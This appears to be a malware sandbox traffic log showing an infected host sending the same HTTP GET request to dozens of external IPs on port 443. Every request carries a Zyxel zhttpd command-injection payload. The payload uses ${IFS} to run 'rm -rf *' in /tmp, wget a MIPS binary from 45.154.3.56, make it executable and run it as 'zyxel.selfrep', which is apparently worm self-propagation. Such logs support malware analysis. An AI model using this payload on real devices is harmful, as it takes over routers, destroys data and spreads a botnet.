                        Mar 12, 2024 08:50:25.006493092 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        536192.168.2.1454732170.254.97.75443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006541014 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        537192.168.2.143432898.238.73.36443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006588936 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        538192.168.2.1433452212.140.59.167443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006639004 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        539192.168.2.1456652192.102.114.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006690025 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        540192.168.2.1433206179.226.86.39443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006731987 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        541192.168.2.1449380121.44.18.19443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006786108 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        542192.168.2.1438144212.138.244.40443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006834030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        543192.168.2.144680846.130.132.110443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006869078 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        544192.168.2.144147487.189.38.103443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006926060 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        545192.168.2.1459912101.236.85.159443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006979942 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        546192.168.2.1455484130.94.122.111443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.007019997 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        547192.168.2.14360045.35.33.223443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.007066011 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        548192.168.2.1457874183.215.202.93443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.007114887 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        549192.168.2.1449180172.63.169.101443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.007174969 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        550192.168.2.144870436.4.71.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.007205963 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        551192.168.2.1438786200.163.249.137443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.007278919 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        552192.168.2.145943458.42.73.238443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.007313967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        553192.168.2.1440416174.177.81.90443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.007342100 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        554192.168.2.145649282.152.48.22443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.007390022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        555192.168.2.144785666.124.235.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.007432938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        556192.168.2.143777684.11.54.38443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.007466078 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        557192.168.2.1453534179.248.161.118443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.007535934 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        558192.168.2.1440238133.194.193.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.007565975 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        559192.168.2.1457250162.219.98.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.007627964 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        560192.168.2.1457506212.227.50.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.007664919 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        561192.168.2.143316469.100.89.236443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.007705927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        562192.168.2.145152676.135.113.255443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.016415119 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        563192.168.2.146075025.198.208.241443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.016577005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        564192.168.2.1453976178.246.68.18443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.016787052 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        565192.168.2.145517866.190.239.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.016822100 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        566192.168.2.144388882.36.13.77443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.016881943 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        567192.168.2.1441668172.244.216.92443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.016932011 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        568192.168.2.1436018142.136.141.231443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.016994953 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        569192.168.2.145726417.61.77.198443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.017060041 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        570192.168.2.1436582221.126.131.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.017122030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        571192.168.2.145430495.19.56.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.017189026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        572192.168.2.1442216202.79.122.168443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.017241955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        573192.168.2.144841039.16.25.107443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.017307997 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        574192.168.2.144526438.193.31.51443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.017354012 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        575192.168.2.1457160175.173.95.193443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.017426014 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        576192.168.2.144306840.17.145.101443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.017530918 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        577192.168.2.1435278105.25.28.135443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.017549038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        578192.168.2.143540083.145.223.202443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.017596006 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        579192.168.2.1457458172.177.129.11443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.017652988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        580192.168.2.1452214170.139.95.76443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.017715931 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        581192.168.2.1448204207.1.81.175443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.017790079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        582192.168.2.1442404187.48.82.68443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.017834902 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        583192.168.2.145288060.154.173.19443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.017921925 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        584192.168.2.145966813.84.230.244443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.017968893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        585192.168.2.144541666.243.167.161443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.018017054 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        586192.168.2.144728291.254.23.62443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.018094063 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        587192.168.2.143292887.21.205.124443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.018130064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        588192.168.2.143576867.253.230.181443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.018215895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        589192.168.2.145297837.84.184.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.018291950 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        590192.168.2.1453654130.20.222.233443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.018346071 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        591192.168.2.1447762221.139.125.149443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.018405914 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        592192.168.2.1451024126.250.255.28443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.018471956 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        593192.168.2.1453556107.11.127.70443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.018510103 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        594192.168.2.1460384118.36.238.237443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.018573999 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        595192.168.2.1459236196.166.36.239443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.018630028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        596192.168.2.145477620.243.76.117443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.018703938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        597192.168.2.144870838.47.244.28443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.018774986 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        598192.168.2.1449904122.96.196.132443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.018843889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        599192.168.2.1454540143.150.164.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.018910885 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        600192.168.2.1457102151.204.50.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.018951893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        601192.168.2.1450818100.46.246.28443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.019013882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        602192.168.2.1451824116.179.170.184443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.019066095 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        603192.168.2.1440116153.160.123.202443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.019109964 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        604192.168.2.1456932177.59.180.207443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.019149065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        605192.168.2.1455152198.56.56.95443
                        TimestampBytes transferredDirectionData
